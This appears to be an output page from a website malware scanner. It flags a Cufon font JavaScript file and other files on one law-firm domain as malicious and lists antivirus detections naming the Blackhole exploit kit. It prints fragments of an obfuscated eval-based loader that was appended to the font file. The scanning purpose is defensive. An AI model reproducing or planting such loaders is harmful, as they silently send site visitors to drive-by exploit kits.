... 3039 bytes are skipped ...5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)} /*/a9a007*/Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/museo_300_300.font.js | 200 OK Content-Length: 235178 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":606,"face":{"font-family":"Museo 300","font-weight":300,"font-stretch":"normal","units-per-em":"1000","panose-1":"2 0 0 0 0 0 0 0 0 0","ascent":"750","descent":"-250","x-height":"12","bbox":"-53 -883 1017 210.052","underline-thickness":"50","underline-position":"-50","stemh":"62","stemv":"70","unicode-range":"U+0020-U+FB04"},"glyphs":{" ":{"w":272,"k":{"\u2026":50,"\u201e":50,"\u201d":70,"\u201c":70,"\u201a":50,"\u2019":70,"\u2018":70,"\u021a":20,"\u0178":35,"\u0176":35,"
... 3004 bytes are skipped ...5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)} /*/a9a007*/Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|